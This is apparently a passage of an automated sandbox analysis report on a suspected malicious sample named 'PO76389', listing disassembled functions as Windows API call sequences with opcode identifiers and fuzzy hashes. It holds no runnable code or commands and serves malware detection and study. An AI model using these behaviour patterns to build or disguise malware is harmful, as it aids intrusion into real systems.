                                                      • Part of subcall function 004F2CAA: lstrcmpiW.KERNEL32(00000000,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2D10
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1916
                                                    • lstrcpyW.KERNEL32(00000000,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F193C
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1970
                                                    Strings
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 23856ec031ef659ef034798e629030beb70d35c90b94b3579c6d070f504c5b5f
                                                    • Instruction ID: 67ba4d0e54f631777b86f6b9418a8d560087fe1df5b110017cd862ded6156bf9
                                                    • Opcode Fuzzy Hash: 23856ec031ef659ef034798e629030beb70d35c90b94b3579c6d070f504c5b5f
                                                    • Instruction Fuzzy Hash: 6311AC76200309EBDB15AF34D855E7A77B8FF44350B80802BE906CB2A0EBB69855D7E5
                                                    APIs
                                                    • _free.LIBCMT ref: 004E3D65
                                                      • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                      • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                      • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00D50000,00000000,00000001), ref: 004D462F
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 62ad7ad45e7a75e1caf495c3d797a257dd3323a9c41749ab2db3d0ed8ffe901d
                                                    • Instruction ID: 65b48b67a3cacf51416199e154b267b1ac81b203f50f594d964c75dd2b3d4e69
                                                    • Opcode Fuzzy Hash: 62ad7ad45e7a75e1caf495c3d797a257dd3323a9c41749ab2db3d0ed8ffe901d
                                                    • Instruction Fuzzy Hash: C511EB31400251ABCB223F73AC18AAA3B98AF50367F10456FF94987391DF7C8E40A659
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004F715C
                                                    • _memset.LIBCMT ref: 004F717D
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004F71CF
                                                    • CloseHandle.KERNEL32(00000000), ref: 004F71D8
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 604b852263efcd560f162314fcc7ec1ec02584885b9f4df7553184b2829295d4
                                                    • Instruction ID: 7420bbb8f6728824b191d700de9b123ef54f7c25ab6cacbb513f05a822be717c
                                                    • Opcode Fuzzy Hash: 604b852263efcd560f162314fcc7ec1ec02584885b9f4df7553184b2829295d4
                                                    • Instruction Fuzzy Hash: 91110A719012287AD7205BA5AC4DFEBBA7CEF45760F10419AF504E72D0D2744E84CBB8
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004F13EE
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004F1409
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004F141F
                                                    • FreeLibrary.KERNEL32(?), ref: 004F1474
                                                    Similarity
                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                    • String ID:
                                                    • API String ID: 3137044355-0
                                                    • Opcode ID: 399fabc238d4e90f68bb36fca76e6fa50854789a7d598271f033fac576e55d85
                                                    • Instruction ID: 71c6191db950903b4ec620bf5d2dd126308a042c7d83df4c8b81ff14f05fc131
                                                    • Opcode Fuzzy Hash: 399fabc238d4e90f68bb36fca76e6fa50854789a7d598271f033fac576e55d85
                                                    • Instruction Fuzzy Hash: A0217F7150020DEBDB20DF91DC88AEABBBCEF40744F00846EE61297160D778EA49DF65
                                                    APIs
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                    • gethostbyname.WS2_32(?), ref: 005092F0
                                                    • WSAGetLastError.WS2_32(00000000), ref: 005092FB
                                                    • _memmove.LIBCMT ref: 00509328
                                                    • inet_ntoa.WS2_32(?), ref: 00509333
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 9d0605e31c6d6ad4cda3a42dc8742cc9598d14801099eb2f0e86705fb99f9ce7
                                                    • Instruction ID: a59faece4f5e605a2753875de6a7cf022c40db674eefb57e5f80f694b7129681
                                                    • Opcode Fuzzy Hash: 9d0605e31c6d6ad4cda3a42dc8742cc9598d14801099eb2f0e86705fb99f9ce7
                                                    • Instruction Fuzzy Hash: E8118E36500109AFCB04FBA1CD46DEEBBB9FF14318710406AF506A72A2DB34AE04DB65
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004EC285
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC297
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2AD
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2C8
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: ac441190c375cc07da697712b259b3547b0bae34a546541c145c466405044aa8
                                                    • Instruction ID: d3b6395981a2f614710b440294e834208fc8073083d15eb34edee93d232ed532
                                                    • Opcode Fuzzy Hash: ac441190c375cc07da697712b259b3547b0bae34a546541c145c466405044aa8
                                                    • Instruction Fuzzy Hash: 4411187AD40218FFDB11DBD9C885E9DBBB4FB08710F204092EA04B7294D671AE11DB94
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 004F7C6C
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 004F7C9F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004F7CB5
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004F7CBC
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 0f372d3132ddc7e04067841f6915d2ffc3dbb33706bbef159c237c0f30e9e8e2
                                                    • Instruction ID: e04abbc7c7f44d343d93c8b2f07fc1e7ddf560cdfcb31460806d0385503c805c
                                                    • Opcode Fuzzy Hash: 0f372d3132ddc7e04067841f6915d2ffc3dbb33706bbef159c237c0f30e9e8e2
                                                    • Instruction Fuzzy Hash: DF110872A04258AFCB019F68EC08AAB7FBE9B14324F144216FA25D3351D6748948B775
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                    • GetStockObject.GDI32(00000011), ref: 004CC66B
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: a2ab15fd248159615988e6b8988e610934733bcc58b359df48c8d03901454aa4
                                                    • Instruction ID: 46e0c5cc657d6d16e6f2eff965f88d8023adf824be1cbf5ba2622168bc466b34
                                                    • Opcode Fuzzy Hash: a2ab15fd248159615988e6b8988e610934733bcc58b359df48c8d03901454aa4
                                                    • Instruction Fuzzy Hash: 6F11A172601549BFDB114FA0AD85FEABB79FF19354F050116FA1852210C736DC60EBA5
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F49EE
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A13
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A1D
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: abed6c6a8664b16146799566f794e058d143bf10bbc649c3d9d52fb4f1959c96
                                                    • Instruction ID: 33c9f45d393563e6f2b8addac5a5c023e277a56ab5cda7d801e2a086e439c18c
                                                    • Opcode Fuzzy Hash: abed6c6a8664b16146799566f794e058d143bf10bbc649c3d9d52fb4f1959c96
                                                    • Instruction Fuzzy Hash: CC115A31D4051CDBCF00EFA5EA49AEFBB74FF59701F000046EA41B2250DB389654DBA9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction ID: 9d5867dca2cb170ba1fdd45c0db641da04ac2a95cbef32f946fbe73becb18368
                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction Fuzzy Hash: C701833200068EBBCF125F86DC51CEE3F22BB18359F558816FE1859131C23AD9B2AB85
                                                    APIs
                                                      • Part of subcall function 004D869D: __getptd_noexit.LIBCMT ref: 004D869E
                                                    • __lock.LIBCMT ref: 004D811F
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004D813C
                                                    • _free.LIBCMT ref: 004D814F
                                                    • InterlockedIncrement.KERNEL32(00D62A98), ref: 004D8167
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 2704283638-0
                                                    • Opcode ID: 91ab35c347e6b935cd427af6733cd18290f0f607b82fd4edaa50a24341e8de27
                                                    • Instruction ID: 7bb0fa705819ce1450a1a960bc1c0d4d24c11a06f4ca905ed6afcb25e74746ba
                                                    • Opcode Fuzzy Hash: 91ab35c347e6b935cd427af6733cd18290f0f607b82fd4edaa50a24341e8de27
                                                    • Instruction Fuzzy Hash: DF0161319016119BCB11AB69982A7BE77B0BF04714F04055FF81467391DF6C6C4ADFDA
                                                    APIs
                                                    • __lock.LIBCMT ref: 004D8768
                                                      • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                      • Part of subcall function 004D8984: RtlEnterCriticalSection.NTDLL(004D0127), ref: 004D89AF
                                                    • InterlockedIncrement.KERNEL32(DC840F00), ref: 004D8775
                                                    • __lock.LIBCMT ref: 004D8789
                                                    • ___addlocaleref.LIBCMT ref: 004D87A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1687444384-0
                                                    • Opcode ID: b9d4b1eb2f69f098c4d39b9e5f88f56c0d4b58bd5ebb9101249506deb799a786
                                                    • Instruction ID: 598087e672e9286ecc6257aa7b4fd0894fe1ffc91ebba3253e6b131da27bf4d8
                                                    • Opcode Fuzzy Hash: b9d4b1eb2f69f098c4d39b9e5f88f56c0d4b58bd5ebb9101249506deb799a786
                                                    • Instruction Fuzzy Hash: BF015B71401B009ED760AF66D81675ABBF0BF54329F20890FE499973A0DBB8A644CF05
                                                    APIs
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 004F9C7F
                                                      • Part of subcall function 004FAD14: _memset.LIBCMT ref: 004FAD49
                                                    • _memmove.LIBCMT ref: 004F9CA2
                                                    • _memset.LIBCMT ref: 004F9CAF
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004F9CBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: dc00246a21cb7991b7e18ac65f6928b281a8ede42d8d430574c629c6645df030
                                                    • Instruction ID: 0787b1c2e98ffb1a33dbfd1d8198f348af717c7167e01faab2f59e78c2d2e10e
                                                    • Opcode Fuzzy Hash: dc00246a21cb7991b7e18ac65f6928b281a8ede42d8d430574c629c6645df030
                                                    • Instruction Fuzzy Hash: 7EF0307A200004ABCB016F55EC85A5ABB39EF45314B04C066FE085E217C735A825DBB5
                                                    APIs
                                                      • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                      • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051E860
                                                    • LineTo.GDI32(00000000,?,?), ref: 0051E86D
                                                    • EndPath.GDI32(00000000), ref: 0051E87D
                                                    • StrokePath.GDI32(00000000), ref: 0051E88B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: 7886cd0e1d7056d182e2d376d521bfef044590daec97b9b6219b1f52a04437e1
                                                    • Instruction ID: af1978f4062d5262f43aa7905824250c6f5f1bcc01e4dd7507ce0047429c4178
                                                    • Opcode Fuzzy Hash: 7886cd0e1d7056d182e2d376d521bfef044590daec97b9b6219b1f52a04437e1
                                                    • Instruction Fuzzy Hash: 0FF0BE31000659BBDB161F54BC0EFCA3FB9AF16710F008141FE01211E1837946A9EFA9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                    • GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                    • AttachThreadInput.USER32(00000000), ref: 004ED661
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: eb5bca6675448581161b8fcd26c34ac3a6fe07bb318157c41a05a28158ef1142
                                                    • Instruction ID: 62b08af9db4e12219062c03b2e4f8af38cb4f0e7daa4c6eda44705339d49c0f6
                                                    • Opcode Fuzzy Hash: eb5bca6675448581161b8fcd26c34ac3a6fe07bb318157c41a05a28158ef1142
                                                    • Instruction Fuzzy Hash: 23E06D31501268BBDB201FB2EC0EEEB7F3CEF217A2F008011B51D85160CAB59594DBB4
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 004CB0C5
                                                    • SetTextColor.GDI32(?,000000FF), ref: 004CB0CF
                                                    • SetBkMode.GDI32(?,00000001), ref: 004CB0E4
                                                    • GetStockObject.GDI32(00000005), ref: 004CB0EC
                                                    • GetWindowDC.USER32(?,00000000), ref: 0052ECFA
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0052ED07
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0052ED20
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0052ED39
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0052ED59
                                                    • ReleaseDC.USER32(?,00000000), ref: 0052ED64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 67098c7702527913cf510124f0dc0adc2025900caa7d7ff18a7fdbb1f76cf9c6
                                                    • Instruction ID: 3b1b4582cd4160b63c42acae9edd2479d7d5446eeb08cfca9cc93e3937dee164
                                                    • Opcode Fuzzy Hash: 67098c7702527913cf510124f0dc0adc2025900caa7d7ff18a7fdbb1f76cf9c6
                                                    • Instruction Fuzzy Hash: 42E0ED31504240AFEB215F74BC4ABD93F31AB66336F14826AF669581E2C7724954EB21
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 0f893c36d44af10f7ec6619579d37df7867d08d3cdcaab36bb856ca0b75dac87
                                                    • Instruction ID: 6e725e31c197169e90fae7b12c6e1954b44813c224d16d997f2698548bf51c9b
                                                    • Opcode Fuzzy Hash: 0f893c36d44af10f7ec6619579d37df7867d08d3cdcaab36bb856ca0b75dac87
                                                    • Instruction Fuzzy Hash: E8E01AB5500210EFDB005F71A84DA693FB5EB58350F11840AF85A87351DAB89985AB64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 51412a3aa513552835a8d638b3a022b3ab3f8022260e14d45934618501290b86
                                                    • Instruction ID: 1ff22da6df17c847a2f3b13784d86678bd1a29f8a7ed72a744fb3303827c5dff
                                                    • Opcode Fuzzy Hash: 51412a3aa513552835a8d638b3a022b3ab3f8022260e14d45934618501290b86
                                                    • Instruction Fuzzy Hash: A5E046B9500200EFDB005F71EC4DA693BB9EB5C360F11840AF95A8B310DBB89985AB64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: >$DEFINE
                                                    • API String ID: 4104443479-1664449232
                                                    • Opcode ID: 0acffda7807c671b9d86241ccfdae4fb34e7b1c789a6d04d30ed40833a383a9b
